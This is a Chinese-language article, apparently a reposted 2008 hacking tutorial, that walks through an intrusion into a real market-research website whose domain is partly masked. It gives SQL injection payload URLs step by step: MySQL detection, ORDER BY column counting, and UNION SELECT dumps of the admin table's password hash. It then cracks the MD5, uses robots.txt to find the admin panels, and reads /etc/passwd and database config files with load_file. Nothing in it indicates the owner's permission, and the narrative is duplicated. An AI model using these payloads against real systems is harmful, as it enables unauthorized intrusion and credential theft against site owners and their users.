詳述php滲透全過程(組圖)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:35:57 作者:佚名
我要評論

最近一直比較關(guān)注PHP注射的東西.學習好幾天了.也應該實戰(zhàn)一下了.目標http://app.xxxx.com .一個市場調(diào)查的門戶.找注射點嘛,還是要用我們可愛的搜索引擎.為什么可愛呢?一會就知道了.Go Go Go !!!!!
在google中搜索php?id= site:xxx.com.意思就是說搜索XXX網(wǎng)站中以php?
最近一直比較關(guān)注PHP注射的東西.學習好幾天了.也應該實戰(zhàn)一下了.目標http://app.xxxx.com .一個市場調(diào)查的門戶.找注射點嘛,還是要用我們可愛的搜索引擎.為什么可愛呢?一會就知道了.Go Go Go !!!!!
在google中搜索php?id= site:xxx.com.意思就是說搜索XXX網(wǎng)站中以php?id=的URL.嘿.還真讓我找到一個. http://app.xxx.com/cati/article_literature.php?id=11 .打開嚇我一條,它頁面本身就存在錯誤直接出來了絕對路徑.
/data01/www/cati/article_literature.php 呵呵,人品爆發(fā)了..通過路徑可以得知是臺Linux主機.判斷下是否可以進行注射.and 1=1返回正常,and 1=2返回錯誤..OK存在注射.然后我們判斷數(shù)據(jù)庫,不出意外應該是mysql.傳說中的LMAP.環(huán)境(L=Linux M=Mysql A=Apache P=Php)
http://app.xxx.com/cati/article_literature.php?id=11/* 在后面加上/*,返回正常則是Mysql.因為/*是Mysql的注釋標記.
返回正常,確定是Mysql的數(shù)據(jù)庫.現(xiàn)在我們來檢測下Mysql的版本.4.0以上支持union聯(lián)合查詢.一般都回是4.0已經(jīng).為什么.因為Mysql是開源的數(shù)據(jù)庫不收費傻子才不更新呢.呵呵.
http://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(version(),1,1))>51/* 如我所料.果然是4.0以上的.OK.我們來爆它的字段.
http://app.xxx.com/cati/article_literature.php?id=11 order by 10
返回錯誤,說明字段小于10
http://app.xxx.com/cati/article_literature.php?id=11 order by 9
返回正常說明它有9個字段.OK.現(xiàn)在我們知道它的字段那我們就來爆它的管理員吧 呵呵.
http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9
出現(xiàn)了一些數(shù)字,一會那個地方會出現(xiàn)我們想要的東西。呵呵,.經(jīng)過返回的測試,確定表段為m_admin.
http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9 from m_admin
返回正常說明存在m_admin標段.接下來我們猜字段.,還記的剛才爆出那個幾個數(shù)字吧,對應我們的URL的數(shù)字.我們用字段名去替換掉它.在頁面里就會顯示出我們需要的內(nèi)容了.最后只能檢出倆個字段.一個為password 一個為id
http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,id,3,4,5,6,7,password,9 from m_admin
2和8的位置出現(xiàn)了我們想要的東西..可惜的沒有檢測到用戶名的字段,不過沒關(guān)系,應該是admin,或administrator.應該問題不大。現(xiàn)在去破解下那個32位的MD5,看看是不是弱口令
我們?nèi)MD5.com看看…
經(jīng)典123456從先江湖.現(xiàn)在我們找下后臺吧。拿工具狂掃半天沒發(fā)現(xiàn)任何可利用的東西。第一次弄PHP的站沒什么經(jīng)驗,丟給SpookZanG幫忙,不過一會丟給我了管理地址和phpmyadmin的地址.汗~~果然牛..原來是robots.txt暴露了信息..一著急給忘了還有個這么個東西.太粗心了.呵呵.說下它是什么東西.搜索引擎會抓取我們網(wǎng)站的每個頁面包括一些敏感的東西.比如MDB.文件,網(wǎng)站后臺,這就是為什么我們可以在google.或百度中搜索到網(wǎng)站后臺了.比如我們有些東西不想被搜索引擎抓取呢?那怎么辦.在網(wǎng)站目錄下創(chuàng)建robots.txt,里面寫不想被搜索引擎抓取的頁面和目錄,就可以了.但是我們直接訪問還是可以給我們暴露一些信息的嘿~..
很明顯/information/admin/為后臺地址測試/My_Db_3000/這個是 phpmyadmin后臺,OK.現(xiàn)在我們進后臺吧.結(jié)果卻…..自動跳轉(zhuǎn)到new/admin了.無法訪問,限制了IP訪問了.郁悶了…一切盡在不言中….
可能大家都知道如果是ROOT的話我們可以條用load_file.去網(wǎng)站源碼.讀類似conn等文件拿到root密碼的話,我們進phpmyadmin也是可以備份shell的.嘿..ok.我們來測試下.先看看帳戶是不是roothttp://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(user(),1,1))=114/*結(jié)果不幸如圖,返回錯誤帳戶不是root.
沒關(guān)系,我們再看看當前帳戶有沒有讀寫權(quán)限
http://app.xxx.com/cati/article_literature.php?id=11 and (select count(*) from mysql.user)>0 /*
嘿,有讀寫權(quán)限.OK.我們用PHP文件讀取器,來證實下吧.軟件默認讀/etc/passwd.我們讀下看看.
可以讀/ect/passwd 呵呵.應該沒什么問題了.還記的我們剛才爆出來的路徑吧.我直接讀/data01/www/cati/article_literature.php 文件的頂端會有數(shù)據(jù)庫調(diào)用的文件.嘿`.
呵呵.出來了.然后我們?nèi)プxmysql.php這個文件.找mysql密碼去.
順利讀出.
OK.我們?nèi)サ顷憄hpmyadmin測試下吧.哈哈.
OK?,F(xiàn)在可以去做我們想做的事了。
在google中搜索php?id= site:xxx.com.意思就是說搜索XXX網(wǎng)站中以php?id=的URL.嘿.還真讓我找到一個. http://app.xxx.com/cati/article_literature.php?id=11 .打開嚇我一條,它頁面本身就存在錯誤直接出來了絕對路徑.

/data01/www/cati/article_literature.php 呵呵,人品爆發(fā)了..通過路徑可以得知是臺Linux主機.判斷下是否可以進行注射.and 1=1返回正常,and 1=2返回錯誤..OK存在注射.然后我們判斷數(shù)據(jù)庫,不出意外應該是mysql.傳說中的LMAP.環(huán)境(L=Linux M=Mysql A=Apache P=Php)
http://app.xxx.com/cati/article_literature.php?id=11/* 在后面加上/*,返回正常則是Mysql.因為/*是Mysql的注釋標記.

返回正常,確定是Mysql的數(shù)據(jù)庫.現(xiàn)在我們來檢測下Mysql的版本.4.0以上支持union聯(lián)合查詢.一般都回是4.0已經(jīng).為什么.因為Mysql是開源的數(shù)據(jù)庫不收費傻子才不更新呢.呵呵.
http://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(version(),1,1))>51/* 如我所料.果然是4.0以上的.OK.我們來爆它的字段.
http://app.xxx.com/cati/article_literature.php?id=11 order by 10

返回錯誤,說明字段小于10
http://app.xxx.com/cati/article_literature.php?id=11 order by 9

返回正常說明它有9個字段.OK.現(xiàn)在我們知道它的字段那我們就來爆它的管理員吧 呵呵.
http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9

出現(xiàn)了一些數(shù)字,一會那個地方會出現(xiàn)我們想要的東西。呵呵,.經(jīng)過返回的測試,確定表段為m_admin.
http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9 from m_admin

返回正常說明存在m_admin標段.接下來我們猜字段.,還記的剛才爆出那個幾個數(shù)字吧,對應我們的URL的數(shù)字.我們用字段名去替換掉它.在頁面里就會顯示出我們需要的內(nèi)容了.最后只能檢出倆個字段.一個為password 一個為id
http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,id,3,4,5,6,7,password,9 from m_admin

2和8的位置出現(xiàn)了我們想要的東西..可惜的沒有檢測到用戶名的字段,不過沒關(guān)系,應該是admin,或administrator.應該問題不大。現(xiàn)在去破解下那個32位的MD5,看看是不是弱口令
我們?nèi)MD5.com看看…

經(jīng)典123456從先江湖.現(xiàn)在我們找下后臺吧。拿工具狂掃半天沒發(fā)現(xiàn)任何可利用的東西。第一次弄PHP的站沒什么經(jīng)驗,丟給SpookZanG幫忙,不過一會丟給我了管理地址和phpmyadmin的地址.汗~~果然牛..原來是robots.txt暴露了信息..一著急給忘了還有個這么個東西.太粗心了.呵呵.說下它是什么東西.搜索引擎會抓取我們網(wǎng)站的每個頁面包括一些敏感的東西.比如MDB.文件,網(wǎng)站后臺,這就是為什么我們可以在google.或百度中搜索到網(wǎng)站后臺了.比如我們有些東西不想被搜索引擎抓取呢?那怎么辦.在網(wǎng)站目錄下創(chuàng)建robots.txt,里面寫不想被搜索引擎抓取的頁面和目錄,就可以了.但是我們直接訪問還是可以給我們暴露一些信息的嘿~..

很明顯/information/admin/為后臺地址測試/My_Db_3000/這個是 phpmyadmin后臺,OK.現(xiàn)在我們進后臺吧.結(jié)果卻…..自動跳轉(zhuǎn)到new/admin了.無法訪問,限制了IP訪問了.郁悶了…一切盡在不言中….

可能大家都知道如果是ROOT的話我們可以條用load_file.去網(wǎng)站源碼.讀類似conn等文件拿到root密碼的話,我們進phpmyadmin也是可以備份shell的.嘿..ok.我們來測試下.先看看帳戶是不是roothttp://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(user(),1,1))=114/*結(jié)果不幸如圖,返回錯誤帳戶不是root.

沒關(guān)系,我們再看看當前帳戶有沒有讀寫權(quán)限
http://app.xxx.com/cati/article_literature.php?id=11 and (select count(*) from mysql.user)>0 /*

嘿,有讀寫權(quán)限.OK.我們用PHP文件讀取器,來證實下吧.軟件默認讀/etc/passwd.我們讀下看看.

可以讀/ect/passwd 呵呵.應該沒什么問題了.還記的我們剛才爆出來的路徑吧.我直接讀/data01/www/cati/article_literature.php 文件的頂端會有數(shù)據(jù)庫調(diào)用的文件.嘿`.

呵呵.出來了.然后我們?nèi)プxmysql.php這個文件.找mysql密碼去.

順利讀出.
OK.我們?nèi)サ顷憄hpmyadmin測試下吧.哈哈.

OK?,F(xiàn)在可以去做我們想做的事了。
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡身份認證過程,利用NTLM重放機制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風險微軟并不認為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進入攻擊者郵箱2016-07-06